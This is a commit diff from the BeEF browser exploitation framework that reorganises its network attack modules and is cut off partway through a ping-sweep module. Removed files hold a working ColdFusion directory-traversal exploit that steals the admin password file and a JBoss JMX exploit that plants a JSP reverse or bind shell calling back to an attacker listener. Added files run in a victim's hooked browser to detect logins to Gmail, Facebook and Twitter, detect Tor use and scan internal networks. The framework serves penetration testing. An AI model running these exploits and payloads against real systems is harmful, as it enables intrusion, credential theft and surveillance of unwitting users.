Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

command modules re-organised and re-named

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@1292 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
wade@bindshell.net
2011-09-16 12:28:14 +00:00
parent 9127bbeb88
commit e97104f696
69 changed files with 41 additions and 41 deletions
Download Patch File Download Diff File Expand all files Collapse all files

47
modules/network/coldfusion_dir_traversal_exploit/command.js
View File

@@ -1,47 +0,0 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/**
* ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .
* Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.
* By default the exploit will retrieve the password.properties file, where the CF admin passwd is stored:
* the user is free to specify any other path that will be appended to the server root (ie C:\ on Windows)
*
* On a default win installation, the following vector works great:
* http://127.0.0.1:8500/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\ColdFusion8\lib\password.properties%00en
* demo CF application-> http://blogs.sitepoint.com/applications-coldfusion-8/
*/
beef.execute(function() {
fileToRetrieve = "<%= @fileToRetrieve %>";
targetOS = "<%= @os_combobox %>";
cf_version = "<%= @cf_version %>";
var uri = null;
if(targetOS == "Windows"){
uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\\ColdFusion' + cf_version + '\\lib\\' + fileToRetrieve + '%00en';
}else{
uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../../opt/coldfusion' + cf_version + '/lib/' + fileToRetrieve + '%00en';
}
beef.net.request("http", "GET", document.domain, document.location.port, uri,null, null, 10, 'text', function(response){
if(response.status_code == "success"){
titleStart = response.response_body.indexOf("<title>");
titleEnd = response.response_body.indexOf("</title>");
exploitResults = response.response_body.substring(titleStart + 7,titleEnd);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=Retrieved contents for file [" + fileToRetrieve + "]: " + exploitResults);
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: directory traversal failed.");
}
});
});

36
modules/network/coldfusion_dir_traversal_exploit/module.rb
View File

@@ -1,36 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
def self.options
return [
{'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties'},
{ 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
'store_fields' => ['os'], 'store_data' => [['Windows'],['Linux/MacOSX/*BSD']],
'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true
},
{ 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore',
'store_fields' => ['cf_version'], 'store_data' => [['8'],['9']],
'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

BIN
modules/network/detect_local_settings/Beeffeine.class
View File

Binary file not shown.

48
modules/network/detect_local_settings/Beeffeine.java
View File

@@ -1,48 +0,0 @@
import java.applet.*;
import java.net.*;
import java.util.*;
public class Beeffeine extends Applet {
public String MyIP()
{
String string = "unknown";
String string4 = getDocumentBase().getHost();
byte j = 80;
String string2;
String string3 = "internal_ip=";
int k = 80;
if (getDocumentBase().getPort() != -1)
k = getDocumentBase().getPort();
try {
string2 = new Socket(string4 , k).getLocalAddress().getHostAddress();
if (!string2.equals("255.255.255.255"))
string3 += string2;
}
catch (SecurityException securityexception) {
string3 += "FORBIDDEN";
}
catch (Exception exception) {
string3 += "exception";
}
string3 += "&internal_hostname=";
try {
string3 += new Socket(string4 , k).getLocalAddress().getHostName();
}
catch (Exception exception) {
string3 += "Cannot Lookup this IP";
}
return (string3);
}
public Beeffeine() {
super();
return;
}
}

52
modules/network/detect_local_settings/command.js
View File

@@ -1,52 +0,0 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
if (beef.browser.isFF()) {
var internal_ip = beef.net.local.getLocalAddress();
var internal_hostname = beef.net.local.getLocalHostname();
if(internal_ip && internal_hostname) {
beef.net.send('<%= @command_url %>', <%= @command_id %>,
'internal_ip='+internal_ip+'&internal_hostname='+internal_hostname);
}
} else {
//Trying to insert the Beeffeine applet
content = "<APPLET code='Beeffeine' codebase='http://"+beef.net.host+":"+beef.net.port+"/Beeffeine.class' width=0 height=0 id=beeffeine name=beeffeine></APPLET>";
$j('body').append(content);
internal_counter = 0;
//We have to kick off a loop now, because the user has to accept the running of the applet perhaps
function waituntilok() {
try {
output = document.beeffeine.MyIP();
beef.net.send('<%= @command_url %>', <%= @command_id %>, output);
$j('#beeffeine').detach();
return;
} catch (e) {
internal_counter++;
if (internal_counter > 20) { //Timeout after 20 seconds
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=time out');
$j('#beeffeine').detach(); //kill the applet
return;
}
setTimeout(function() {waituntilok()},1000);
}
}
//Lets not kick this off just yet
setTimeout(function() {waituntilok()},5000);
}
});

37
modules/network/detect_local_settings/module.rb
View File

@@ -1,37 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_local_settings < BeEF::Core::Command
def pre_send
#Mount the Beeffeine.class on /Beeffeine.class
#Unsure if there's something we can add here to check if the module was already mounted?
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/detect_local_settings/Beeffeine.class','/Beeffeine','class')
end
def post_execute
content = {}
content['internal ip'] = @datastore['internal_ip'] if not @datastore['internal_ip'].nil?
content['internal hostname'] = @datastore['internal_hostname'] if not @datastore['internal_hostname'].nil?
content['fail'] = 'could not grab local network settings' if content.empty?
#Unmount the class now, it's no longer required.
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/Beeffeine.class');
save content
end
end

83
modules/network/detect_soc_nets/command.js Normal file
View File

@@ -0,0 +1,83 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var facebookresult = "";
var twitterresult = "";
if (document.getElementById('gmailimg')) {
return "Img has already been created";
}
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.src = 'https://mail.google.com/mail/photos/static/AD34hIiQyJTs5FhsJ1mhFdK9wx4OZU2AgLNZLBbk2zMHYPUfs-ZzXPLq2s2vdBmgnJ6SoUCeBbFnjRlPUDXw860gsEDSKPrhBJYDgDBCd7g36x2tuBQc0TM?'+ new Date();
img.id = 'gmailimg';
img.setAttribute("attr","start");
img.onerror = function() {
this.setAttribute("attr","error");
};
img.onload = function() {
this.setAttribute("attr","load");
};
document.body.appendChild(img);
$j.ajax({
url: "https://twitter.com/account/use_phx?setting=false&amp;format=text",
dataType: "script",
cache: "false",
complete: function(one, two) {
if (two == "success") {
twitterresult = "User is NOT authenticated to Twitter (response:"+two+")";
} else if (two == "timeout") {
twitterresult = "User is authenticated to Twitter (response:"+two+")";
}
},
timeout: <%= @timeout %>
});
$j.ajax({
url: "https://www.facebook.com/imike3",
dataType: "script",
cache: "false",
error: function(one, two, three) {
facebookresult = "User is NOT authenticated to Facebook";
},
success: function(one, two, three) {
facebookresult = "User is authenticated to Facebook";
},
timeout: <%= @timeout %>
});
setTimeout(function() {
var img2 = document.getElementById('gmailimg');
if (img2.getAttribute("attr") == "error") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'gmail=User is NOT authenticated to GMail&twitter='+twitterresult+'&facebook='+facebookresult);
} else if (img2.getAttribute("attr") == "load") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'gmail=User is authenticated to GMail&twitter='+twitterresult+'&facebook='+facebookresult);
} else if (img2.getAttribute("attr") == "start") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'gmail=Browser timed out. Cannot determine if user is authenticated to GMail&twitter='+twitterresult+'&facebook='+facebookresult);
};
document.body.removeChild(img2);
img = null;
img2 = null;
}, <%= @timeout %>+3000);
});

8
modules/network/coldfusion_dir_traversal_exploit/config.yaml → modules/network/detect_soc_nets/config.yaml
View File

@@ -15,11 +15,11 @@
#
beef:
module:
coldfusion_dir_traversal_exploit:
detect_soc_nets:
enable: true
category: "Network"
name: "ColdFusion Directory Traversal Exploit"
description: "ColdFusion 9.0, 8.0.1, 9.0 and 9.0.1 are vulnerable to directory traversal that leads to arbitrary file retrieval from the ColdFusion server (CVE-2010-2861)"
authors: ["antisnatchor"]
name: "Detect Social Networks"
description: "This module will detect if the Hooked Browser is currently authenticated to GMail, Facebook and Twitter."
authors: ["xntrik", "Mike Cardwell"]
target:
working: ["ALL"]

32
modules/network/detect_soc_nets/module.rb Normal file
View File

@@ -0,0 +1,32 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_soc_nets < BeEF::Core::Command
def self.options
return [
{'name' => 'timeout', 'ui_label' => 'Detection Timeout','value' => '5000'}
]
end
def post_execute
content = {}
content['GMail'] = @datastore['gmail']
content['Facebook'] = @datastore['facebook']
content['Twitter']= @datastore['twitter']
save content
end
end

50
modules/network/detect_tor/command.js Normal file
View File

@@ -0,0 +1,50 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
if (document.getElementById('torimg')) {
return "Img already created";
}
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
img.id = 'torimg';
img.setAttribute("attr","start");
img.onerror = function() {
this.setAttribute("attr","error");
};
img.onload = function() {
this.setAttribute("attr","load");
};
document.body.appendChild(img);
setTimeout(function() {
var img = document.getElementById('torimg');
if (img.getAttribute("attr") == "error") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is not behind Tor');
} else if (img.getAttribute("attr") == "load") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is behind Tor');
} else if (img.getAttribute("attr") == "start") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser timed out. Cannot determine if browser is behind Tor');
};
document.body.removeChild(img);
}, <%= @timeout %>);
});

12
modules/network/detect_local_settings/config.yaml → modules/network/detect_tor/config.yaml
View File

@@ -15,13 +15,11 @@
#
beef:
module:
detect_local_settings:
detect_tor:
enable: true
category: "Network"
name: "Detect Local Settings"
description: "Grab the local network settings (ie internal ip address)."
authors: ["pdp", "wade", "bm", "xntrik"]
name: "Detect Tor"
description: "This module will detect if the zombie is currently using Tor (https://www.torproject.org/)."
authors: ["wade", "pdp", "bm", "xntrik"]
target:
working: ["FF", "IE"]
user_notify: "C"
not_working: "S"
working: ["ALL"]

30
modules/network/detect_tor/module.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_tor < BeEF::Core::Command
def self.options
return [
{'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'}
]
end
def post_execute
return if @datastore['result'].nil?
save({'result' => @datastore['result']})
end
end

108
modules/network/internal_network_fingerprinting/command.js Normal file
View File

@@ -0,0 +1,108 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var dom = document.createElement('b');
var ips = new Array();
ipRange = "<%= @ipRange %>";
ports = "<%= @ports %>";
if(ports != null){
ports = ports.split(',');
}
if(ipRange != null){
// ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated.
// (only C class IPs are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for(i=lowerBound;i<=upperBound;i++){
ipToTest = "http://"+ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}else{
//use default IPs
ips = [
'http://192.168.0.1',
'http://192.168.0.100',
'http://192.168.0.254',
'http://192.168.1.1',
'http://192.168.1.100',
'http://192.168.1.254',
'http://10.0.0.1',
'http://10.1.1.1',
'http://192.168.2.1',
'http://192.168.2.254',
'http://192.168.100.1',
'http://192.168.100.254',
'http://192.168.123.1',
'http://192.168.123.254',
'http://192.168.10.1',
'http://192.168.10.254'
];
}
var urls = new Array(
// in the form of: "Dev/App Name","Default Port","Use Multiple Ports if specified","IMG url","IMG width","IMG height"
new Array("Apache",":80",false,"/icons/apache_pb.gif",259,32),
new Array("Apache 2.x",":80",false,"/icons/apache_pb2.gif",259,32),
new Array("Microsoft IIS 7.x",":80",false,"/welcome.png",571,411),
new Array("Microsoft IIS",":80",false,"/pagerror.gif",36,48),
new Array("QNAP NAS",":8080",false,"/ajax_obj/img/running.gif",16,16),
new Array("QNAP NAS",":8080",false,"/ajax_obj/images/qnap_logo_w.gif",115,21),
new Array("Belkin Router",":80",false,"/images/title_2.gif",321,28),
new Array("SMC Networks",":80",false,"/images/logo.gif",133,59),
new Array("Linksys NAS",":80",false,"/Admin_top.JPG",750,52),
new Array("Linksys NAS",":80",false,"/logo.jpg",194,52),
new Array("Linksys Network Camera",":80",false,"/welcome.jpg",146,250),
new Array("Linksys Wireless-G Camera",":80",false,"/header.gif",750,97),
new Array("Cisco IP Phone",":80",false,"/Images/Logo",120,66),
new Array("Snom Phone",":80",false,"/img/snom_logo.png",168,62),
new Array("Brother Printer",":80",false,"/pbio/brother.gif",144,52),
new Array("HP LaserJet",":80",false,"/hp/device/images/logo.gif",42,27),
new Array("JBoss Application server",":8080",true,"/images/logo.gif",226,105),
new Array("Siemens Simatic",":80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
new Array("APC InfraStruXure Manager",":80",false,"/images/Xlogo_Layer-1.gif",342,327),
new Array("Barracuda Spam/Virus Firewall",":8000",true,"/images/powered_by.gif",211,26),
new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16)
);
// for each ip
for(var i=0; i < ips.length; i++) {
// for each url
for(var u=0; u < urls.length; u++) {
if(!urls[u][2] && ports != null){ // use default port
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
img.id = u;
img.src = ips[i]+urls[u][1]+urls[u][3];
img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
dom.appendChild(img);
}else{ // iterate to all the specified ports
for(p=0;p<ports.length;p++){
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
img.id = u;
img.src = ips[i]+":"+ports[p]+urls[u][3];
img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
dom.appendChild(img);
}
}
}
}
});

11
modules/network/vtiger_crm_upload_exploit/config.yaml → modules/network/internal_network_fingerprinting/config.yaml
View File

@@ -15,11 +15,12 @@
#
beef:
module:
vtiger_crm_upload_exploit:
internal_network_fingerprinting:
enable: true
category: "Network"
name: "VTiger CRM Upload Exploit"
description: "This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href=\"http://www.vtiger.com/\">vtiger 5.0.4</a><br />The default PHP requires a listener, so don't forget to start one, for example: nc -l 8888."
authors: ["wade", "bm", "pipes", "xntrik", "yorikv"]
name: "Fingerprint Network"
description: "Discover devices and applications in the network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea)."
authors: ["bcoles@gmail.com", "wade", "antisnatchor"]
target:
working: ["ALL"]
user_notify: ["FF", "IE"]
not_working: ["O"]

55
modules/network/internal_network_fingerprinting/module.rb Normal file
View File

@@ -0,0 +1,55 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Internal Network Fingerprinting
# Discover devices and applications in the internal network of the victim using
# signatures like default logo images/favicons (partially based on the Yokoso idea).
# It does this by loading images on common/predefined local network
# IP addresses then matching the image width, height and path to those
# for a known device.
#
# TODO LIST
# Add IPv6 support
# Add HTTPS support
# - Devices with invalid certs are blocked by IE and FF by default
# Improve stealth
# - Load images with CSS "background:" CSS to avoid http auth login popups
# Improve speed
# - Make IP addresses a user-configurable option rather than a hard-coded list
# - Detect local ip range first - using browser history and/or with java
# - History theft via CSS history is patched in modern browsers.
# - Local IP theft with Java is slow and may fail
class Internal_network_fingerprinting < BeEF::Core::Command
def self.options
return [
{'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
{'name' => 'ports', 'ui_label' => 'Ports to test', 'value' => '80,8080'}
]
end
def post_execute
content = {}
content['device'] =@datastore['device'] if not @datastore['device'].nil?
content['url'] = @datastore['url'] if not @datastore['url'].nil?
if content.empty?
content['fail'] = 'No devices/applications have been discovered.'
end
save content
end
end

67
modules/network/jboss_jmx_upload_exploit/command.js
View File

@@ -1,67 +0,0 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/**
* Jboss 6.0.0M1 JMX Upload Exploit
* Ported from l33tb0y Ruby code in Javascript by antisnatchor.
* HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler OR shell binding to high port
*
* This is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell.
* This is the stealthiest approach: nothing is shown on the logs
*/
beef.execute(function() {
rhost = "<%= @rhost %>";
rport = "<%= @rport %>";
lhost = "<%= @lhost %>";
lport = "<%= @lport %>";
injectedCommand = "<%= @injectedCommand %>";
jspName = "<%= @jspName %>";
payloadType = "<%= @payload %>";
reverse = "try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
bind = "try%20%7B%20ServerSocket%20server_socket%20=%20new%20ServerSocket(%20" + lport + "%20);%20Socket%20socket%20=%20server_socket.accept();%20server_socket.close();%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
if(payloadType == "reverse"){
payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + reverse + "%25%3E";
}else{
payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + bind + "%25%3E";
}
uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
/* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/
beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){
if(response.status_code == "success"){
function triggerReverseConn(){
beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){
if(response.status_code == "success"){
if(payloadType == "reverse"){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener.");
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Bind JSP shell should have been triggered. Try to connect to "+rhost+":"+lport+".");
}
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
}
});
}
// give the time to JBoss to deploy the JSP reverse shell
setTimeout(triggerReverseConn,10000);
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed.");
}
});
});

37
modules/network/jboss_jmx_upload_exploit/module.rb
View File

@@ -1,37 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Jboss_jmx_upload_exploit < BeEF::Core::Command
def self.options
return [
{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
{'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'},
{'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666'},
{'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe'},
{'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32)},
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
'store_fields' => ['payload'], 'store_data' => [['reverse'],['bind']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

80
modules/network/ping_sweep/command.js Normal file
View File

@@ -0,0 +1,80 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var ips = new Array();
ipRange = "<%= @ipRange %>";
timeout = "<%= @timeout %>";
delay = parseInt(timeout) + parseInt("<%= @delay %>");
// ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated.
// Note: if ipRange is just an IP address like 192.168.0.1, the ips array will contain only one element: ipBounds[0]
// (only C class IPs are supported atm). Same code as internal_network_fingerprinting module
ipBounds = ipRange.split('-');
if(ipBounds.length>1) {
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for(i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i
ips.push(ipToTest);
}
} else {
ipToTest = ipBounds[0]
ips.push(ipToTest);
}
if(ips.length==1) verbose=true;
else verbose=false; /* enable for debug */
